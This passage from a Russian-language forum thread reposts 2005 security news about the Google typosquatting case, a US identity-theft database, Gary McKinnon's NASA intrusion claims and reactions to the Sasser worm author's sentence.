    Дело о «тайпсквоттинге» появилось на свет несколько месяцев назад — 26 апреля 2005 г. антивирусная компания F-Secure сообщила об обнаружении веб-сайта, который заманивает пользователей, с опечаткой набравших название популярного поискового сайта Google.com. Если пользователь ошибся всего в одной букве, то его компьютер сразу же подвергался атаке. Автоматически скачивались и устанавливались несколько троянов, а также шпионские файлы рекламных сетей. Сайт был зарегистрирован на некоего Сергея Гридасова, жителя Санкт-Петербурга, а несколько вредоносных файлов, которые скачиваются на компьютер пользователя, содержали русскоязычный текст.

    Естественно, такая наглость со стороны бывших соотечественников не осталась без внимания руководства компании Google, так что 11 мая 2005 г. они подали иск в специально созданную для таких случаев общественную организацию — Национальный арбитражный форум, где решаются спорные вопросы о доменных именах. В этом случае решался вопрос о четырех доменах, которые зарегистрировал «тайпсквоттер» — googkle.com, ghoogle.com, gfoogle.com и gooigle.com.

    В ходе рассмотрения дела было установлено, что Сергей Гридасов зарегистрировал домены в декабре 2000 г. и январе 2001 г., тогда как компания Google зарегистрировала свой домен в конце 1999 г. Гридасов использовал свой сайты для редиректа на другие сайты, где компьютеры заражались вредоносным ПО, а содержание ресурсов не имело ничего общего с Google.

    Жителю Санкт-Петербурга было направлено уведомление о рассмотрении его дела, но ответа не пришло. Таким образом, он ничего не смог ответить на выдвинутые против него обвинения. Национальный арбитражный форум принял решение, установив, что Гридасов не имеет юридических прав на четыре вышеупомянутых домена, а их названия можно спутать с Google — зарегистрированной торговой маркой, что вводит в заблуждение пользователей. Таким образом. жителя Петербурга лишили сайтов, которые он зарегистрировал четыре с половиной года назад. Наверняка, он уже успел достаточно на них заработать, чтобы не жалеть о потере.

    Национальный арбитражный форум и другие аналогичные организации ежегодно рассматривают несколько тысяч подобных дел, руководствуясь единым регламентом UDRP (Uniform Domain Name Dispute Resolution Policy), вступившим в силу в декабре 1999 г. Среди этих дел постоянно фигурируют ответчики из России, поэтому дело Гридасова не является чем-то экстраординарным.

    Источник:webplanet.ru
     
  18. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    США упрощают поиск похитителей идентификационных данных

    Центр помощи пострадавшим от кражи идентификационных данных готов предоставлять данные Федеральной комиссии США по торговле (FTC), чтобы упростить поиск похитителей персональных сведений о пользователях компьютерных сетей.

    FTC будет размещать полученные сведения в своей клиентской базе данных, доступ к которой имеют более 1300 федеральных и локальных отделений правоохранительных структур, сообщает сайт Security Pipeline. База данных FTC используется как источник информации в рамках расследований дел о хищении идентификационных данных, заявляют представители ФБР.

    Центр помощи пострадавшим от кражи идентификационных данных финансируется банками. Служащие центра помогают пострадавшим от краж получать доступ к своим кредитным отчетам, извещать о преступлениях кредитные бюро и уведомлять компании о том, что в их клиентских рядах появляются люди с чужими кредитными картами. В ходе первого года своей работы Центр помощи пострадавшим от кражи идентификационных данных помог 2000 потерпевших.
     
  19. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    Британский хакер раскрывает тайны Nasa

    39-летний британец Гари Маккиннон (Gary McKinnon), подозреваемый во взломе сетей 53 американских правительственных структур, рассказал о том, что ему удалось обнаружить в сети Национального управления по аэронавтике и исследованию космического пространства (NASA).

    «Я обнаружил список сотрудников под заголовком "Неназемные сотрудники". Я думаю, то, что за этим скрывается, находится не на Земле. Я обнаружил список названий трансферов между техническими подразделениями и список названий кораблей. Это были не названия кораблей ВМС США. То, что я увидел, мне кажется, было названиями космических кораблей», — рассказал Маккиннон в интервью газете Guardian. В то же время он признался, что не может сообщить о проекте дополнительных деталей потому, что плохо их помнит. По признанию хакера, в момент взлома сети NASA он активно курил легкие наркотики.

    39-летний хакер рассказал, что заинтересовался взломом сетей для того, чтобы отыскать доказательства существования НЛО. Маккиннон утверждает, что в конечном результате сумел добраться до американского центра управления космическими полетами и обнаружил там свидетельства подготовки межпланетной миссии.

    Маккиннон отказывается признавать то, что его действия могли вывести американскую компьютерную систему из строя. При этом хакер согласился, что мог удалить несколько файлов из правительственных сетей, случайно нажав не ту кнопку.

    «В то время, как вы находитесь в сети, можно выполнить команду NetStat — Network Status. С ее помощью можно увидеть все соединения с машиной, к которой подсоединены и вы. В числе подсоединившихся были хакеры из Дании, Италии, Германии, Таиланда... Я делал это каждую ночь в течение 5-7 лет», — рассказал Маккиннон, которому грозит лишение свободы на срок до 70 лет.

    Источник:viruslist.com
     
  20. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    Пользователи считают приговор Яшану слишком мягким

    Более трех четвертей ПК-пользователей из бизнес-структур полагают, что приговор автору червя Sasser Свену Яшану слишком мягок. Таковы результаты опроса, проведенного сотрудниками антивирусной компании Sophos, сообщает сайт vnunet.com.

    Лишь менее одной пятой 550 респондентов считают, что условное лишение свободы на 21 месяц является адекватным наказанием для Яшана. В то же время 78 процентов полагают, что создатель Sasser «легко отделался». Лишь каждый 20-й респондент посчитал приговор Яшану слишком суровым.

    «Мы также считаем, что приговор Яшану неадекватен нанесенному им ущербу, — комментирует антивирусный эксперт "Лаборатории Касперского" Александр Гостев. — Если подобные приговоры станут нормой, то все труды антивирусных компаний, усилия Microsoft, ФБР и других структур будут бессмысленны. Данный приговор не показывает, что написание вирусов является чем-то действительно преступным и не служит сдерживающим фактором для других вирусописателей. Наконец, если вспомнить недавние судебные процессы по делам крупных спамеров, закончившиеся десятилетними сроками заключения, приговор, вынесенный судом Свену Яшану, программа которого буквально "остановила интернет", становится просто смешным», — отметил Александр.

    Приговор Свену Яшану был вынесен в минувшую пятницу. По решению суда, Яшан получил наказание в виде 21 месяца лишения свободы условно с испытательным сроком 3 года. Кроме того, создателю червя Sasser необходимо отработать 30 часов на общественных работах.

    Источник:viruslist.co
     
Loading...